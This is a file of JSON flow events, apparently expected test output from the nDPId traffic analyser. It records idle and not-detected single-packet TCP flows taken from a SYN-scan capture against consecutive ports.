+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 